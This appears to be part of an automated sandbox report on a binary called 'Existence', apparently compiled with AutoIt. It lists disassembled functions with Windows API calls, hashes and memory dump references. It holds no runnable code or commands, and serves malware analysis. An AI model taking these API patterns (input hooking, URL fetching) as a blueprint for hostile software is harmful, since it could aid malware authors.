                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                          • API String ID: 711023334-1403004172
                                                                                                                                                                                          • Opcode ID: 715edcbc6a7277bfb4e5ad56d958085c73e3270f6f0b67bd7c29bacfe363141b
                                                                                                                                                                                          • Instruction ID: f805268724bfb877c8178edb2d29c4f235ddbe06a83a8b34b7c7420d12644feb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 715edcbc6a7277bfb4e5ad56d958085c73e3270f6f0b67bd7c29bacfe363141b
                                                                                                                                                                                          • Instruction Fuzzy Hash: B521D4B4900118FBCF10AFA0DC89EEEBBB4EF05350F10416AB951A7292DB3D5819DB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
                                                                                                                                                                                            • Part of subcall function 007945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00794620
                                                                                                                                                                                          • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00792990
                                                                                                                                                                                          • GetDlgCtrlID.USER32 ref: 0079299B
                                                                                                                                                                                          • GetParent.USER32 ref: 007929B7
                                                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 007929BA
                                                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 007929C3
                                                                                                                                                                                          • GetParent.USER32(?), ref: 007929D7
                                                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 007929DA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                          • API String ID: 711023334-1403004172
                                                                                                                                                                                          • Opcode ID: 8fa83370bbe6b1ba7192ca4ce919dad087d24e423823e0a48876a7e4e0a758a6
                                                                                                                                                                                          • Instruction ID: e23ac08e17996f9a7be39a42cb50062da295bbf11ffef128589e482c5a3c26b8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8fa83370bbe6b1ba7192ca4ce919dad087d24e423823e0a48876a7e4e0a758a6
                                                                                                                                                                                          • Instruction Fuzzy Hash: AB21A1B5A00118FBDF11ABA0DC89EFEBBB8EF05350F104056BA51A7292CB7D5819DB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007C4539
                                                                                                                                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007C453C
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 007C4563
                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007C4586
                                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007C45FE
                                                                                                                                                                                          • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 007C4648
                                                                                                                                                                                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 007C4663
                                                                                                                                                                                          • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 007C467E
                                                                                                                                                                                          • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 007C4692
                                                                                                                                                                                          • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 007C46AF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$LongWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 312131281-0
                                                                                                                                                                                          • Opcode ID: 98887cad9248683b215a485db471f95e2f5817de59e79dafb3446dcb90148bb1
                                                                                                                                                                                          • Instruction ID: 30c8c24d6037a581112743693e344a3de8d83aa122492ff6ac6dd730382fb9d3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 98887cad9248683b215a485db471f95e2f5817de59e79dafb3446dcb90148bb1
                                                                                                                                                                                          • Instruction Fuzzy Hash: DF616A75A00218AFDB21DFA8CC85FEE77B8EB09710F10415AFA14E72A1D7B8AD45DB50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0079BB18
                                                                                                                                                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0079ABA8,?,00000001), ref: 0079BB2C
                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 0079BB33
                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0079ABA8,?,00000001), ref: 0079BB42
                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0079BB54
                                                                                                                                                                                          • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0079ABA8,?,00000001), ref: 0079BB6D
                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0079ABA8,?,00000001), ref: 0079BB7F
                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0079ABA8,?,00000001), ref: 0079BBC4
                                                                                                                                                                                          • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0079ABA8,?,00000001), ref: 0079BBD9
                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0079ABA8,?,00000001), ref: 0079BBE4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2156557900-0
                                                                                                                                                                                          • Opcode ID: 47c0271059ea31caf09b72cc749d8746dee79923ed6c2c30b0d19f60db2d5717
                                                                                                                                                                                          • Instruction ID: 7bbfbaaa641e95889c41b368f46e1302bac07fe3f9c8c334d0387c94b71fa515
                                                                                                                                                                                          • Opcode Fuzzy Hash: 47c0271059ea31caf09b72cc749d8746dee79923ed6c2c30b0d19f60db2d5717
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B318CF2904604AFDF609BA4FE88F6977B9BB44356F118019FB05A62E4D7B89C40CB64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007A89F2
                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 007A8A06
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 007A8A30
                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 007A8A4A
                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 007A8A5C
                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 007A8AA5
                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 007A8AF5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                                          • API String ID: 769691225-438819550
                                                                                                                                                                                          • Opcode ID: f3b2e3d110738574cbfaf943db561fdb5a3db59aa614497ec757f7b58baa7e58
                                                                                                                                                                                          • Instruction ID: 58ff92e9883bb342c84227d837ff66b1a2a3f019131770e55180195543cc3f8e
                                                                                                                                                                                          • Opcode Fuzzy Hash: f3b2e3d110738574cbfaf943db561fdb5a3db59aa614497ec757f7b58baa7e58
                                                                                                                                                                                          • Instruction Fuzzy Hash: C4817E72904245DBDB64EF14C444AABB3E8BBC6310F548A1EF885D7251EF3CE9458B53
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EB), ref: 007374D7
                                                                                                                                                                                            • Part of subcall function 00737567: GetClientRect.USER32(?,?), ref: 0073758D
                                                                                                                                                                                            • Part of subcall function 00737567: GetWindowRect.USER32(?,?), ref: 007375CE
                                                                                                                                                                                            • Part of subcall function 00737567: ScreenToClient.USER32(?,?), ref: 007375F6
                                                                                                                                                                                          • GetDC.USER32 ref: 00776083
                                                                                                                                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00776096
                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 007760A4
                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 007760B9
                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 007760C1
                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00776152
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                          • String ID: U
                                                                                                                                                                                          • API String ID: 4009187628-3372436214
                                                                                                                                                                                          • Opcode ID: eedeb1b263227a1c2be193b1ea0435e288109614b7982589206a691b7ccad19c
                                                                                                                                                                                          • Instruction ID: c97625464da9319abd42053888aedc4fd5d04b0492d8930fb696e98273a8913b
                                                                                                                                                                                          • Opcode Fuzzy Hash: eedeb1b263227a1c2be193b1ea0435e288109614b7982589206a691b7ccad19c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8871DF71500609EFDF358F64CC88EAA3BB1FF493A0F248269ED595A1ABC7399C40DB50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073249F: GetWindowLongW.USER32(00000000,000000EB), ref: 007324B0
                                                                                                                                                                                            • Part of subcall function 007319CD: GetCursorPos.USER32(?), ref: 007319E1
                                                                                                                                                                                            • Part of subcall function 007319CD: ScreenToClient.USER32(00000000,?), ref: 007319FE
                                                                                                                                                                                            • Part of subcall function 007319CD: GetAsyncKeyState.USER32(00000001), ref: 00731A23
                                                                                                                                                                                            • Part of subcall function 007319CD: GetAsyncKeyState.USER32(00000002), ref: 00731A3D
                                                                                                                                                                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 007C95C7
                                                                                                                                                                                          • ImageList_EndDrag.COMCTL32 ref: 007C95CD
                                                                                                                                                                                          • ReleaseCapture.USER32 ref: 007C95D3
                                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 007C966E
                                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 007C9681
                                                                                                                                                                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 007C975B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                          • API String ID: 1924731296-2107944366
                                                                                                                                                                                          • Opcode ID: 7451fc99e66fb3c25f5f50e8a9dd23d822fbbc248b9591c376287ef4c4672faa
                                                                                                                                                                                          • Instruction ID: 16b5a67f79238f91aa4c07b53b42844f27af18ad071bcb8cf0516812019459fd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7451fc99e66fb3c25f5f50e8a9dd23d822fbbc248b9591c376287ef4c4672faa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 71517C71104304AFE754EF24CC5AFAA77E4FB84714F400A2CFA95962E2DB79AD48CB52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007ACCB7
                                                                                                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007ACCDF
                                                                                                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007ACD0F
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 007ACD67
                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 007ACD7B
                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 007ACD86
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3113390036-3916222277
                                                                                                                                                                                          • Opcode ID: b040bb577a3f6e6ab25eed5878c626c7edc9e673fae7898a28283a14ee8fcb3c
                                                                                                                                                                                          • Instruction ID: f788075f4fc4af7b20d8a2b94c4611db2e56b675a2cdd3a17594ae660b0bbe18
                                                                                                                                                                                          • Opcode Fuzzy Hash: b040bb577a3f6e6ab25eed5878c626c7edc9e673fae7898a28283a14ee8fcb3c
                                                                                                                                                                                          • Instruction Fuzzy Hash: CB314171600604BFD7329F658D88EAB7BFCEB86744B10462DF44697200DB38DD049B65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,007755AE,?,?,Bad directive syntax error,007CDCD0,00000000,00000010,?,?), ref: 0079A236
                                                                                                                                                                                          • LoadStringW.USER32(00000000,?,007755AE,?), ref: 0079A23D
                                                                                                                                                                                            • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
                                                                                                                                                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0079A301
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                          • API String ID: 858772685-4153970271
                                                                                                                                                                                          • Opcode ID: 605df48f5affd571ac2202b7ff3598167b119930cb627cd3ec357d989b9ecad7
                                                                                                                                                                                          • Instruction ID: 26bd0ef30c8b4942ba0a103ff41a593ed0e9fecee2ca1f86edf2ce53b918a5c7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 605df48f5affd571ac2202b7ff3598167b119930cb627cd3ec357d989b9ecad7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 73216F7190021EFFDF15ABA0CC0AEEE7B39BF18300F044469F615651A2EB799618DB51
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetParent.USER32 ref: 007929F8
                                                                                                                                                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00792A0D
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00792A9A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClassMessageNameParentSend
                                                                                                                                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                          • API String ID: 1290815626-3381328864
                                                                                                                                                                                          • Opcode ID: 51e80c0b9d6a3e515451ae103458782adb8f2e6978762e2a5caacc4b707e1dd0
                                                                                                                                                                                          • Instruction ID: e7305829fc2de485f4d952041dc2fe65b9305af6a24ce8ba9da10d6840f88593
                                                                                                                                                                                          • Opcode Fuzzy Hash: 51e80c0b9d6a3e515451ae103458782adb8f2e6978762e2a5caacc4b707e1dd0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9711E3B734830AF9FA247720EC0ADA677ADDF14724B308026FE04E40D2FBAD68464658
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0073758D
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 007375CE
                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 007375F6
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0073773A
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0073775B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1296646539-0
                                                                                                                                                                                          • Opcode ID: 698e72a407f8e2bc66da5e604c8797ef35ac90fe293b5f9ee05c7ec2a741174f
                                                                                                                                                                                          • Instruction ID: 34f4852668c0c827dd00a5d6d7cb1f59391696b34689d1bf43fd5d11452cf974
                                                                                                                                                                                          • Opcode Fuzzy Hash: 698e72a407f8e2bc66da5e604c8797ef35ac90fe293b5f9ee05c7ec2a741174f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 76C16C7990464AEFEF24CFA8C540BEDB7F1FF18310F14841AE899A3255D738A951DB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1282221369-0
                                                                                                                                                                                          • Opcode ID: 353213a95b4a7ac839b0bc547b1d4bf925450141ad1e4238ea09e9970dfbdc28
                                                                                                                                                                                          • Instruction ID: 1652812f263284490673c0d281f8f3afa1036ba9f44631f034bd0a82f4fbd4ad
                                                                                                                                                                                          • Opcode Fuzzy Hash: 353213a95b4a7ac839b0bc547b1d4bf925450141ad1e4238ea09e9970dfbdc28
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C61F471F14701EFDF31AF65D899AAA7BA4FF02320F04016DED46EB282E6399C018751
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 007C5C24
                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 007C5C65
                                                                                                                                                                                          • ShowWindow.USER32(?,00000005,?,00000000), ref: 007C5C6B
                                                                                                                                                                                          • SetFocus.USER32(?,?,00000005,?,00000000), ref: 007C5C6F
                                                                                                                                                                                            • Part of subcall function 007C79F2: DeleteObject.GDI32(00000000), ref: 007C7A1E
